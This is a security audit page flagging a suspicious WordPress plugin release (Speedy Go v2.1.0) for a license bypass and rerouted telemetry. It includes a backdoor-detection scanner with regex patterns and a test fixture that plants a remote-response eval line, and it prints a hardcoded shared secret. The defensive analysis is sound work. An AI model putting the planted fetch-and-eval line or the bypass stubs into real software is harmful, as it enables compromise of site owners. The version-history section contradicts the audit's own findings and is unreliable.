Campaign Codeandcore 2 audits


Audit #34 Suspicious

Speedy Go · 20 installs · baseline 2.0.3 → head 2.1.0 · closed 1mo ago

Actor: codeandcore (Code and Core Tech LLP, India) — same wp.org account as prior releases; v2.1.0 release shape suggests possible SVN-credential compromise, pending vendor confirmation

Verdict: SUSPICIOUS. Speedy Go v2.1.0 (released 2026-05-04) is a hostile-shape release pushed to the wp.org slug under the legitimate author's account. The changelog literally advertises "Bypassed all API key and license verification requirements. The plugin now functions as a full version," the class-license-verifier.php file is gutted to return true for every method, the canonical vendor API constant CNC_SG_API_URL = 'https://speedygo.io' is removed, and the telemetry endpoint is rerouted from a Hostinger staging URL to a 24-year-old aged domain (wordpress-plugins.pro) whose ownership we cannot tie to the named author. The author of record (codeandcore, Code and Core Tech LLP, India) has been the consistent committer since the plugin's first release in October 2025, but the legitimate vendor product speedygo.io is still actively selling Pro licenses — making the "we removed all licensing" narrative internally inconsistent. Either the wp.org SVN credentials were compromised and an attacker pushed a cracked + telemetry-rerouted build, or the author intentionally undercut their own paid SaaS in a way that mimics every cracked-release fingerprint. Until codeandcore confirms in their own communication channel that v2.1.0 was their intentional release, we do not consider it safe.

No active malware payload was found. A full file-by-file review of v2.1.0 came up clean on every supply-chain primitive: no eval of HTTP response, no Plugin Update Checker hijack, no $_FILES + include chain, no writes to wp-config.php or .htaccess that execute PHP, no obfuscation, no time-bombs, no magic-header backdoors. The diff is overwhelmingly subtractive — 2,741 lines deleted, 103 added — so there is simply no new code in which to hide a backdoor. The single-line URL swap in includes/telemetry.php (red-fly-431376.hostingersite.com/receiver.php → wordpress-plugins.pro/receiver.php) is fire-and-forget; the response body is never retrieved, decrypted, or executed.

Why we still mark it suspicious. The shape matches the early stage of a supply-chain attack: (1) push a "trust-establishing" release that gives existing free users a perceived upgrade ("now everything's free!"), (2) redirect telemetry to attacker-controlled infrastructure to build an install inventory, (3) follow up with a future weaponized update on top of the expanded user base. We have seen this exact playbook before (audit #12 — scroll-top / Benjamin / @milkitall — followed the same telemetry-first, weaponize-second pattern). Without vendor confirmation that codeandcore intentionally released v2.1.0 with this content, the conservative posture is to flag and wait.

What to do as a site admin running speedy-go. Until a verdict update lands here: do NOT update to v2.1.0. If you've already updated, you can either roll back to v2.0.3 (download from the wp.org "Advanced View" page) or remove the plugin entirely. The plugin's caching/minification features can be replaced by any of several alternatives (W3 Total Cache, WP Super Cache, LiteSpeed Cache) that are not under suspicion. There is no evidence of code execution against your site — the worst case is that your site URL + WP version + theme info has been added to the wordpress-plugins.pro install inventory, which is metadata you've likely already exposed publicly via your site's HTML headers.

⚠️ Pattern detected — pending vendor response or further evidence.

Not yet confirmed malicious. Site owners should treat with caution; plugin author should review the cleanup steps.

If you run speedy-go on your site

Verify your install matches the wp.org canonical version:

```sh
wp plugin verify-checksums speedy-go
```

A patched build isn't yet published for this audit. Check the security advisories index or remove the plugin until one is available.

If you're the plugin author

Until a verdict update lands: do NOT update to v2.1.0. If already updated, roll back or replace.

We have not found active malware in v2.1.0, but the release shape is strongly inconsistent with the legitimate vendor's stated business, and it matches the early-stage shape of past confirmed supply-chain attacks. The conservative posture is to assume compromise until codeandcore confirms otherwise.

## If you have NOT updated yet

Stay on v2.0.3. Disable WordPress's auto-update for this specific plugin until further notice:

  1. Go to Plugins → Installed Plugins in your wp-admin.
  2. Find Speedy Go in the list.
  3. Click the Disable auto-updates link in the right column.

If your site is configured for fully-automatic plugin updates and v2.1.0 has already been pulled in, follow the next section.

## If v2.1.0 is already running

You have three options, in order of safety:

### Option 1 — Roll back to v2.0.3 (recommended)

  1. Visit the wp.org plugin page: https://wordpress.org/plugins/speedy-go/
  2. Click Advanced View at the bottom
  3. Choose 2.0.3 from the Previous versions dropdown and download the zip
  4. In wp-admin: deactivate Speedy Go, delete it (this preserves your settings in the database), then upload + activate the v2.0.3 zip via Plugins → Add New → Upload Plugin
  5. Disable auto-updates for the plugin per the steps above

### Option 2 — Switch to a different caching plugin

The caching/minification feature set in Speedy Go is well-covered by alternatives that are not under suspicion:

  • W3 Total Cache (free, 1M+ installs)
  • WP Super Cache (free, 2M+ installs, by Automattic)
  • LiteSpeed Cache (free if your host runs LiteSpeed, otherwise free CDN-only mode)
  • Cache Enabler (free, by KeyCDN — minimal/lightweight)

Deactivate Speedy Go, delete it, install the alternative.

### Option 3 — Keep v2.1.0 and accept the risk

If you do not want to roll back: at minimum, ensure the plugin's "tracking opt-in" setting is OFF (Speedy Go → Settings → Telemetry, uncheck "Allow anonymous diagnostic data"). This stops your site from POSTing site metadata to wordpress-plugins.pro/receiver.php. Do not click the deactivate-feedback "agree to be contacted" checkbox — that's the only path that sends your admin email and display name.

You should still revert if a verdict update upgrades this audit to malicious, which would happen if:

  • The vendor (codeandcore) confirms v2.1.0 was not their intentional release
  • A subsequent release adds an active code-execution primitive on top of the v2.1.0 telemetry redirect
  • wordpress-plugins.pro begins serving non-empty responses (currently fire-and-forget, but server-side behavior could change)

## What this release CANNOT do (for reassurance)

Based on the file-by-file review, v2.1.0 has no code path that:

  • Executes attacker-controlled PHP on your site
  • Creates new admin users
  • Modifies wp-config.php, .htaccess-with-PHP-handlers, or any other privileged file outside the plugin's own cache directories
  • Reads database passwords, API keys, or session tokens
  • Hijacks the WordPress plugin update mechanism (no PUC library, no pre_set_site_transient_update_plugins hook)
  • Hooks into login/registration flows
  • Touches any user data outside opt-in deactivation feedback

The risk is future: if this is the first move of a supply-chain attack, the attacker now knows your site exists, what version of WP/PHP/your theme you run, and when you deactivate. They could leverage that inventory in a future weaponized release. That's why we recommend rolling back even though the current code is not actively malicious.

## What to do if you submitted deactivation feedback

If you typed an email address into the "agree to be contacted" form on a previous deactivation cycle of any v1.x or v2.0.x version, that email was sent (encrypted, but with a hardcoded shared secret) to red-fly-431376.hostingersite.com/deactive-receiver.php. If you submit it on v2.1.0, it goes to wordpress-plugins.pro/deactive-receiver.php instead. Treat that email as having been disclosed to whoever controls the receiving endpoint — which we cannot positively attribute. If you used a sensitive admin email for that submission, consider rotating it.

## Stay tuned

This audit will be updated when we get vendor confirmation (or lack thereof). Watch the page at https://wpbeacon.io/audits/<id>/ for status changes. If we update to benign, you can safely update; if we update to malicious, we'll add a clear "remove immediately" instruction.

The label clears automatically on the next wp beacon scan-deltas once the cleanup conditions above are met.

Plugins under the same committer's SVN access

codeandcore holds push access to 6 plugins totalling 350 active installs. Each non-target plugin scans clean today but represents a one-commit hijack opportunity.

| Plugin | Status | Active installs |
|---|---|---|
| Speedy Go | this audit | 20 |
| Slug Search and Admin Columns | clean code, same SVN account (latent risk) | 100 |
| WYSIWYG Character Limit for ACF | clean code, same SVN account (latent risk) | 100 |
| Codeandcore User Registration for CF7 | clean code, same SVN account (latent risk) | 50 |
| Code and Core Remove Empty P Tags | clean code, same SVN account (latent risk) | 40 |
| Image Preview for ACF Field | clean code, same SVN account (latent risk) | 40 |

Plugin version history

Every release on wp.org for this plugin, color-coded by relationship to the incident. The compromise window shows where the wp.org Plugin Review Team deleted the malicious tags from SVN — those versions cannot be re-downloaded today.

  1. Clean — 5 earlier releases before the incident
    • 1.0.0
    • 1.0.1
    • 2.0.0
    • 2.0.1
    • 2.0.2
  2. 2.0.3 — Last clean release before incident
  3. 🛑 Compromise window — 49 days · 2026-03-16 → 2026-05-04

    Malicious releases pushed during this window were deleted from SVN by the wp.org Plugin Review Team. Last malicious tag: 2.1.0.

  4. 2.1.0 — PRT cleanup release — incident closed
  5. 2.1.1 — Current release

Timeline

  • 2024-04-24 — codeandcore wp.org account created (display name "Code and Core", India, employer "Code and core Tech LLP")
  • 2025-10-29 — Speedy Go v1.0.0 published. plugin-master initial commit; immediately followed by codeandcore first commit ("Initial release")
  • 2026-02-24 — v1.0.1 ("premium Telemetry redesign and critical branding refactored for better compliance and security")
  • 2026-03-03 → 2026-03-16 — v2.0.0 → v2.0.3 (incremental updates)
  • 2026-05-04 15:21:41 UTC — v2.1.0 ("Major update: Offline activation enabled")

All 11 wp.org SVN commits across the plugin's lifetime have been by the same author (codeandcore). The Author URI in the plugin header (https://codeandcore.com) is unchanged across all releases.

What v2.1.0 changed

Diff stats: 103 insertions, 2,741 deletions across 28 files.

Removed (deletions)

  • assets/css/admin-bar.css, admin-debug.css, dashboard-widget.css, notices.css, popup-modal.css, select2.min.css — premium admin UI styles
  • assets/images/speedtest-pro-banner.png, webp-pro-banner.png — pro-tier upgrade banners
  • assets/js/admin-bar-progress.js, admin-debug.js, chart.js, dashboard-widget.js, popup-modal.js, select2.min.js — premium admin UI behaviors
  • includes/admin-connection.php — license-key entry / connection page (127 lines)
  • includes/admin-pagespeed.php — PageSpeed dashboard (71 lines)
  • includes/admin-webp-settings.php — WebP conversion settings (67 lines)
  • includes/api-key-api.php — API-key REST handler (361 lines)
  • ~378 lines from includes/class-license-verifier.php (gutted to 73-line return true stub)

Modified

  • speedy-go.php main file: removed `define('CNC_SG_API_URL', 'https://speedygo.io')`, replaced `$is_connected = !empty($stored_api_key)` with `$is_connected = true; // Forced connection status`, hardcoded redirect to settings page regardless of license state
  • includes/class-license-verifier.php — every method short-circuits to "active pro"; no remote calls remain:

```php
public static function is_pro_active() {
    return true;
}

public static function verify_license_status($force = false) {
    return ['is_pro' => true, 'plan' => 'pro', 'success' => true, 'timestamp' => time()];
}
```

  • includes/telemetry.php — single-line URL swap:

```diff
- 'https://red-fly-431376.hostingersite.com/receiver.php',
+ 'https://wordpress-plugins.pro/receiver.php',
```

    Payload, encryption (AES-256-CBC + HMAC-SHA256), shared-secret key (`8jF29fLkmsP0V9as0DLkso2P9lKs29FjsP4k2F0lskM2k`), and fire-and-forget pattern are unchanged.

  • includes/deactivation-feedback.php — same single-line URL swap to wordpress-plugins.pro/deactive-receiver.php.

README.txt 2.1.0 changelog (verbatim)

= 2.1.0 =
* New: Bypassed all API key and license verification requirements. The plugin now functions as a full version.
* Enhancement: Streamlined admin interface by removing redundant Connection, WebP Conversion, and PageSpeed pages.
* Cleanup: Removed JS Interaction and Import/Export features for a more focused performance experience.
* Security: Updated all remote endpoints for telemetry and feedback to use secure infrastructure.
* Fix: Resolved undefined variable warnings and improved internal cache handling logic.

The phrase "Bypassed all API key and license verification requirements" is identical to wording used by cracked-software redistributors on warez sites. A legitimate vendor announcing a free-tier expansion would more typically write "Removed license requirement — Speedy Go is now fully free" or "Open-sourcing our Pro tier."

Telemetry payload contents

Per includes/telemetry.php:270-291, the encrypted POST to wordpress-plugins.pro/receiver.php contains: site_url, plugin_name, plugin_version, event, php_version, wp_version, theme_name, theme_version, is_multisite, site_language, timestamp, plus event-specific extras (e.g. old_version/new_version on plugin update).

No DB content, no admin user list, no auth keys, no file paths, no plugin/theme inventory. No PII unless the user opts in via the deactivation-feedback "agree_contact" checkbox, in which case display_name and user_email are added.

Telemetry is gated behind get_option('speedygo_tracking_optin') === 'yes' (set via an opt-in modal on first activation).

Backdoor hunt — full negative

| Vector | Result |
|---|---|
| Update-channel hijack (PUC, hardcoded download URLs, transient hooks) | None. Zero pre_set_site_transient_update_plugins, zero plugins_api, zero upgrader_* filters, no PUC library bundled. The dead speedygo_prevent_repo_update function exists but is never registered as a filter. |
| Authentication backdoors (magic headers, IP allowlists, URL admin grants, hardcoded creds) | None. No HTTP_X_* checks, no wp_set_password / wp_create_user. |
| Hidden persistence / time-bombs (date-gated code, base64+eval, function aliasing, reflection, PHP in non-PHP files) | None. Zero eval, assert, create_function, base64_decode, gzinflate, gzuncompress, hex2bin, str_rot13. The lone time() < $expiration is just cache-expiry. |
| Uploader chains ($_FILES + include/eval, REST writers, wp-config writes) | None. Zero $_FILES, zero php://input, zero register_rest_route. |
| Telemetry response eval / include | None. All three wp_remote_post/wp_remote_get calls (telemetry, deactivation-feedback, cache-preloader) are fire-and-forget — response is never retrieved or executed. |
| Disk writes outside plugin paths | None malicious. Writes go to WP_CONTENT_DIR/speedy-go-cache/..., wp_upload_dir()/speedygo-cache/..., and .htaccess (only static caching directives — no RewriteRule to PHP, no AddHandler, no auto_prepend_file). |
| Obfuscation (encoded blobs, str_replace/chr chains, lookalike chars, files mismatching purpose) | None. Source is plain readable PHP. No PHP tags hidden in .js, .css, .png, .json, .md, .txt. |
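As an added example (not the audit's own tooling and not Speedy Go code), the scanner below runs the vector checks from this table over a plugin directory and reports the file, line and matched token for any hit. The regex lists are an assumption about how each vector would be grepped for, and the mini-plugin it writes to a temp directory is a constructed sample, one clean and one with a planted update-hook + eval-of-response signature.

```python
import os
import re
import tempfile

# One regex list per audit vector; any hit would turn that table row non-None.
VECTORS = {
    "update_hijack": [r"pre_set_site_transient_update_plugins", r"\bplugins_api\b",
                      r"\bupgrader_\w+", r"PucFactory|Puc_v\d"],
    "auth_backdoor": [r"\$_SERVER\[\s*['\"]HTTP_X_\w+", r"\bwp_set_password\s*\(",
                      r"\bwp_create_user\s*\("],
    "persistence": [r"\b(eval|assert|create_function)\s*\(",
                    r"\b(base64_decode|gzinflate|gzuncompress|hex2bin|str_rot13)\s*\("],
    "uploader_chain": [r"\$_FILES\b", r"php://input", r"\bregister_rest_route\s*\("],
    "telemetry_eval": [r"\b(eval|include|require)\s*\(?\s*wp_remote_retrieve_body"],
    "htaccess_php": [r"(?im)^\s*(AddHandler|php_value\s+auto_prepend_file)\b",
                     r"(?i)RewriteRule[^\n]*\.php"],
}
NON_PHP = (".js", ".css", ".png", ".json", ".md", ".txt")


def scan_plugin(root):
    """Walk a plugin directory; return {vector: [(rel_path, line_no, match), ...]}."""
    hits = {v: [] for v in list(VECTORS) + ["php_in_non_php"]}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            with open(path, "rb") as fh:
                text = fh.read().decode("utf-8", "replace")
            # A PHP open tag inside an asset file is a classic hiding spot.
            if name.lower().endswith(NON_PHP) and "<?php" in text:
                line = 1 + text.count("\n", 0, text.index("<?php"))
                hits["php_in_non_php"].append((rel, line, "<?php"))
            # .htaccess is judged only by handler/rewrite rules; everything else by the rest.
            vecs = ["htaccess_php"] if name == ".htaccess" else [v for v in VECTORS if v != "htaccess_php"]
            for vec in vecs:
                for pat in VECTORS[vec]:
                    for m in re.finditer(pat, text):
                        hits[vec].append((rel, 1 + text.count("\n", 0, m.start()), m.group(0)))
    return hits

def is_clean(hits):
    """True when every row is 'None', i.e. the audit's full-negative result."""
    return not any(hits.values())

def build_sample(plant_backdoor):
    """Write a constructed mini-plugin (not Speedy Go's code) to a temp dir."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "includes"))
    with open(os.path.join(root, "includes", "telemetry.php"), "w") as fh:
        # Fire-and-forget POST, as in the audited telemetry: the response is never read.
        fh.write("<?php\nwp_remote_post('https://example.invalid/receiver.php', ['body' => $payload]);\n")
    with open(os.path.join(root, ".htaccess"), "w") as fh:
        fh.write("ExpiresActive On\nExpiresByType text/css \"access plus 1 year\"\n")
    if plant_backdoor:  # constructed signature lines that the hunt should flag
        with open(os.path.join(root, "includes", "updater.php"), "w") as fh:
            fh.write("<?php\nadd_filter('pre_set_site_transient_update_plugins', 'sg_hook');\n"
                     "eval(wp_remote_retrieve_body(wp_remote_get($u)));\n")
    return root
```

Running `scan_plugin(build_sample(False))` reproduces the full-negative table above, while the planted variant lights up the update-hijack, persistence and telemetry-eval rows at once, which is the combination the audit says is absent from v2.1.0.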

Domain analysis

| Domain | WHOIS creation | Hosting | Notes |
|---|---|---|---|
| speedygo.io | 2025-10-01 | Hostinger (147.79.x) | Genuine vendor product page; live, sells Pro at "70% OFF" promo. Privacy-redacted registrant in Iceland. |
| codeandcore.com | (existing, established) | | Author URI; consistent across all plugin versions. |
| red-fly-431376.hostingersite.com | (Hostinger auto-name) | Hostinger free tier | Prior telemetry endpoint (v1.0.1 → v2.0.3). Looks like author's pre-production sandbox. |
| wordpress-plugins.pro | 2002-05-08 | Hostinger (145.223.x) | New telemetry endpoint in v2.1.0. 24-year-old aged domain. Ownership not provable from public records (privacy protection). Returns HTTP 401 with WWW-Authenticate: Basic realm="Tracking Admin" at root. |

The age of wordpress-plugins.pro is the most ambiguous data point. Aged domains can mean:

  • Long-time domain owner with consistent identity (compatible with codeandcore having quietly held the domain for years)
  • An attacker who specifically purchased an aged domain to look more legitimate (a known tactic in supply-chain campaigns where fresh-domain detection is a known IOC)

Both speedygo.io and wordpress-plugins.pro resolve to Hostinger IPs — same provider, but different /16 ranges. We cannot determine from public records whether they share an account.

Hijack-indicator matrix

| Indicator | Result |
|---|---|
| Sole committer for ≥2 years? | Plugin is only ~6 months old; codeandcore has been the only committer the entire time. |
| Sudden new committer before this release? | No. v2.1.0 was committed by the same codeandcore SVN account as every prior release. |
| Author profile drift? | No. wp.org profile (codeandcore) unchanged: India, "Code and Core Tech LLP", member-since 2024-04-24. |
| Author URI / Plugin header swap? | No. Author: Codeandcore, Author URI: https://codeandcore.com unchanged in v2.1.0. |
| Code-level malware patterns? | No (full file-by-file review came up clean). |
| Outbound C2 / known bad domains? | Unconfirmed. wordpress-plugins.pro is not in any current threat-intel feed, but is also not provably tied to codeandcore. |
| New SVN credentials before this release? | Cannot determine without wp.org SVN log inspection beyond wp_beacon_plugin_committers (only shows committer slugs, not credential rotation). |

The matrix is mostly clean — but the changelog phrasing + telemetry redirect + business-model contradiction with speedygo.io is enough to keep us in suspicious-tier rather than benign.

Comparable cases

  • Audit #12 — scroll-top / Benjamin / @milkitall — different mechanism (PUC update-checker hijack), but similar early-stage shape: a "trust-establishing" release that didn't yet contain the active payload, followed by a weaponized update. The difference: scroll-top had clear hijack indicators (different committer, fresh domain) which speedy-go does not yet have.
  • Audit #28 — siteguarding 27-plugin portfolio — Wholesale-suite cracked-redistribution pattern. Different actor, same shape of "license bypass + telemetry to attacker domain." Siteguarding had confirmed malware (audit #25 IOC overlap); speedy-go does not.
  • WPFactory cross-selling library FP class (memory: project_wpfactory_cross_selling_fp_2026-04-27) — shape-similar (vendor admin telemetry) but with branded vendor domain. Speedy-go's wordpress-plugins.pro is generic-named, which is closer to scroll-top than to a legitimate vendor pattern.

Open questions for vendor confirmation

If codeandcore (the legitimate author) is reading this audit:

  1. Did you intentionally release v2.1.0 from your own SVN credentials? If yes, please confirm via your codeandcore.com or speedygo.io blog/newsroom that this was a deliberate change to your wp.org distribution.
  2. Do you own and operate wordpress-plugins.pro? Confirming with a DNS TXT record on the domain or a blog post on codeandcore.com would resolve the ownership ambiguity.
  3. Why does speedygo.io still actively sell PRO licenses if the wp.org build is now "fully free"? Is the wp.org distribution being deprecated in favor of direct sales? Is this a temporary state ahead of a wp.org takedown?

If you (the author) confirm the release was intentional, this audit will be updated to benign (guideline-violation: undisclosed business-model change). If you indicate that v2.1.0 was NOT your release, please rotate your wp.org SVN credentials immediately and contact wp.org's plugin review team.